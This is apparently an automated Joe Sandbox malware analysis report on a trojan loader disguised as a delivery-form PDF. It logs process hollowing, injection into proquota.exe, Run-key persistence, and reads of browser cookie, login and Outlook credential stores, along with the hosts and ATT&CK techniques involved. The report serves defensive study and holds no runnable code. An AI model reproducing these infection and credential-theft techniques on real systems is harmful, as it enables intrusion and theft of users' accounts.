Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Section loaded: NULL target: C:\Windows\SysWOW64\proquota.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\proquota.exe | Thread APC queued: target process: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Section unmapped: C:\Users\Public\Libraries\dxobknwL.pif base address: 400000
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Section unmapped: C:\Users\Public\Libraries\dxobknwL.pif base address: 400000
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Section unmapped: C:\Users\Public\Libraries\dxobknwL.pif base address: 400000
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Memory written: C:\Users\Public\Libraries\dxobknwL.pif base: 3EA008
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Memory written: C:\Users\Public\Libraries\dxobknwL.pif base: 33F008
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Memory written: C:\Users\Public\Libraries\dxobknwL.pif base: 2A1008
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Process created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Process created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Process created: C:\Users\Public\Libraries\dxobknwL.pif C:\Users\Public\Libraries\dxobknwL.pif
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Process created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
Source: C:\Windows\SysWOW64\proquota.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Process created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
Source: IzFuULsBXSkS.exe, 0000000F.00000000.2070949198.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000002.2916132035.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2916109568.0000000001940000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: IzFuULsBXSkS.exe, 0000000F.00000000.2070949198.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000002.2916132035.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2916109568.0000000001940000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: IzFuULsBXSkS.exe, 0000000F.00000000.2070949198.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000002.2916132035.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2916109568.0000000001940000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: IzFuULsBXSkS.exe, 0000000F.00000000.2070949198.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000002.2916132035.0000000001310000.00000002.00000001.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2916109568.0000000001940000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_02935A78
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: GetLocaleInfoA, | 0_2_0293A798
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: GetLocaleInfoA, | 0_2_0293A74C
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_02935B84
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, | 5_2_02875A78
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: GetLocaleInfoA, | 5_2_0287A798
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, | 5_2_02875B83
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02939194 GetLocalTime, | 0_2_02939194
Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0293B714 GetVersionExA, | 0_2_0293B714
Source: C:\Users\Public\Libraries\Lwnkboxd.PIF | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 14.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\proquota.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\proquota.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

Source: Yara match | File source: 14.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix, listed per tactic column. Techniques prefixed with a number are the ones the report flagged; the number is the count shown for that technique in the matrix. Unnumbered techniques are the matrix's remaining cells and were not observed.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 1 Native API; 1 Shared Modules; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 1 Valid Accounts; 1 Access Token Manipulation; 512 Process Injection; 1 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 2 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 11 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 2 Virtualization/Sandbox Evasion; 512 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 1 System Time Discovery; 1 System Network Connections Discovery; 1 File and Directory Discovery; 136 System Information Discovery; 421 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1580843
Sample: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Startdate: 26/12/2024
Architecture: WINDOWS
Score: 100

Top-level DNS/IP nodes: www.bellhomehd.shop; drive.usercontent.google.com; 2 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 12 other signatures

Process tree as drawn in the graph (edges: started, injected, dropped; the counters next to a process name are the created-registry-value and created-file counts from the legend, in the order the graph shows them):

• Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe (started; counters 1, 10)
    DNS/IP: drive.usercontent.google.com 142.250.181.97, 443, 49732, GOOGLEUS, United States; drive.google.com 172.217.19.238, 443, 49730, 49731, GOOGLEUS, United States
    Dropped: C:\Users\Public\Libraries\dxobknwL.pif, PE32; C:\Users\Public\Libraries\Lwnkboxd.PIF, PE32; C:\Users\Public\Lwnkboxd.url, MS; 2 other malicious files
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique
    • dxobknwL.pif (started)
        Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process
        • IzFuULsBXSkS.exe (injected)
            • proquota.exe (started; counter 13)
                Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Maps a DLL or memory area into another process; 2 other signatures
                • IzFuULsBXSkS.exe (injected)
                    DNS/IP: 94950.bodis.com 199.59.243.227, 49756, 80, BODIS-NJUS, United States
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                • firefox.exe (started)
    • cmd.exe (started; counter 1)
        • conhost.exe (started)
• Lwnkboxd.PIF (started; counter 6)
    Signatures: Multi AV Scanner detection for dropped file; Sample is not signed and drops a device driver; Allocates many large memory junks
    • dxobknwL.pif (started)
        • IzFuULsBXSkS.exe (injected)
            Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
            • proquota.exe (started)
    • cmd.exe (started)
        • conhost.exe (started)
• Lwnkboxd.PIF (started; counter 6)
    • cmd.exe (started; counter 1)
        • conhost.exe (started)
    • dxobknwL.pif (started)

Source | Detection | Scanner | Label | Link
Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | 34% | Virustotal | | Browse
Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | 63% | ReversingLabs | Win32.Trojan.DBatLoader |

Source | Detection | Scanner | Label | Link
C:\Users\Public\Libraries\Lwnkboxd.PIF | 63% | ReversingLabs | Win32.Trojan.DBatLoader |
C:\Users\Public\Libraries\dxobknwL.pif | 3% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://programania.com/en.htm | 0% | Avira URL Cloud | safe |
http://programania.com/index_ru.htm | 0% | Avira URL Cloud | safe |
http://programania.com/en_source.zip | 0% | Avira URL Cloud | safe |
http://programania.com/en.zip | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
94950.bodis.com | 199.59.243.227 | true | false | | high
drive.google.com | 172.217.19.238 | true | false | | high
drive.usercontent.google.com | 142.250.181.97 | true | false | | high
www.bellhomehd.shop | unknown | unknown | false | | unknown
Name | Source (processes whose memory or dropped files contained the string) | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF | false | | high
https://ac.ecosia.org/autocomplete?q= | proquota.exe | false | | high
https://drive.usercontent.google.com/P0 | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | false | | high
https://www.google.com | proquota.exe; IzFuULsBXSkS.exe; firefox.exe | false | | high
https://duckduckgo.com/chrome_newtab | proquota.exe | false | | high
https://duckduckgo.com/ac/?q= | proquota.exe | false | | high
https://sectigo.com/CPS0 | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF | false | | high
http://programania.com/en.htm | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF.0.dr | false | Avira URL Cloud: safe | unknown
http://programania.com/en.zip | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF.0.dr | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF | false | | high
http://ocsp.sectigo.com0 | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF | false | | high
http://programania.com/en_source.zip | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF.0.dr | false | Avira URL Cloud: safe | unknown
https://drive.google.com/ | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | false | | high
http://programania.com/index_ru.htm | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | proquota.exe | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | proquota.exe | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | proquota.exe | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF | false | | high
https://www.ecosia.org/newtab/ | proquota.exe | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | proquota.exe | false | | high
http://ocsp.sectigo.com0C | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF | false | | high
http://www.pmail.com0 | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Lwnkboxd.PIF; proquota.exe; IzFuULsBXSkS.exe; firefox.exe; dxobknwL.pif.0.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.19.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
199.59.243.227 | 94950.bodis.com | United States | 395082 | BODIS-NJUS | false
142.250.181.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1580843
                                                                    Start date and time:2024-12-26 11:51:07 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 32s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:3
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@27/8@3/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 98%
                                                                    • Number of executed functions: 69
                                                                    • Number of non-executed functions: 250
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:51:58 | API Interceptor | 2x Sleep call for process: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe modified
05:52:19 | API Interceptor | 4x Sleep call for process: Lwnkboxd.PIF modified
10:52:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Lwnkboxd C:\Users\Public\Lwnkboxd.url
10:52:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Lwnkboxd C:\Users\Public\Lwnkboxd.url
Match | Associated Sample Name / URL | Detection | Threat Name | Context
199.59.243.227 | SW_48912.scr.exe | malicious | FormBook | www.1337street.shop/0gdu/
199.59.243.227 | rQuotation.exe | malicious | FormBook | www.sob.rip/w4ic/?4v7=yS69adElfH9iGuX+6qGjDo1pzUaFwG2aAiZ0CSeLQ3WEURd5D9NqWLH4alYcst9SwKAkCKhjPGbctdXA/FIYLK0HEa0UfTU4rNsaCNMRH49YQwEuYtvnEXw=&pRel=chN0
199.59.243.227 | https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdf | malicious | PDFPhish | ww25.crewmak.ru/_tr
199.59.243.227 | htkeUc1zJ0.exe | malicious | Unknown | ww7.cutit.org/oxgBR?usid=27&utid=9975975645
199.59.243.227 | DHL.exe | malicious | FormBook | www.969-usedcar02.shop/cfcv/
199.59.243.227 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | www.sorket.tech/ul4e/
199.59.243.227 | 236236236.elf | malicious | Unknown | survey-smiles.com/
199.59.243.227 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | ww7.przvgke.biz/aikqer?usid=23&utid=8062768193
199.59.243.227 | Payment Copy #190922-001.exe | malicious | FormBook | www.deadshoy.tech/0sq9/
199.59.243.227 | new.exe | malicious | FormBook | www.vavada-official.buzz/emhd/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94950.bodis.com | SW_48912.scr.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | rQuotation.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Payment Copy #190922-001.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | new.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | PO 1202495088.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | SHIPPING DOC.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Purchase order MIPO2425110032.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | PI916810.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | SALES ORDER875.exe | malicious | FormBook | 199.59.243.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context
BODIS-NJUS | SW_48912.scr.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | rQuotation.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdf | malicious | PDFPhish | 199.59.243.205
BODIS-NJUS | Tbconsulting Company Guidelines Employee Handbook.docx | malicious | Unknown | 199.59.243.227
BODIS-NJUS | htkeUc1zJ0.exe | malicious | Unknown | 199.59.243.227
BODIS-NJUS | DHL.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | Tbconsulting Company Guidelines Employee Handbook.docx | malicious | Unknown | 199.59.243.205
BODIS-NJUS | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 199.59.243.227
BODIS-NJUS | Payment Copy #190922-001.exe | malicious | FormBook | 199.59.243.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | ciwa.mp4.hta | malicious | LummaC, PureLog Stealer | 142.250.181.97, 172.217.19.238
a0e9f5d64349fb13191bc781f81f42e1 | Set-up.exe | malicious | LummaC | 142.250.181.97, 172.217.19.238
a0e9f5d64349fb13191bc781f81f42e1 | setup.exe | malicious | LummaC | 142.250.181.97, 172.217.19.238
a0e9f5d64349fb13191bc781f81f42e1 | Set-up.exe | malicious | LummaC Stealer | 142.250.181.97, 172.217.19.238
a0e9f5d64349fb13191bc781f81f42e1 | SET_UP.exe | malicious | LummaC | 142.250.181.97, 172.217.19.238
a0e9f5d64349fb13191bc781f81f42e1 | 00000.ps1 | malicious | LummaC | 142.250.181.97, 172.217.19.238
a0e9f5d64349fb13191bc781f81f42e1 | 123.ps1 | malicious | LummaC | 142.250.181.97, 172.217.19.238
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 142.250.181.97, 172.217.19.238
a0e9f5d64349fb13191bc781f81f42e1 | vce exam simulator 2.2.1 crackk.exe | malicious | LummaC | 142.250.181.97, 172.217.19.238
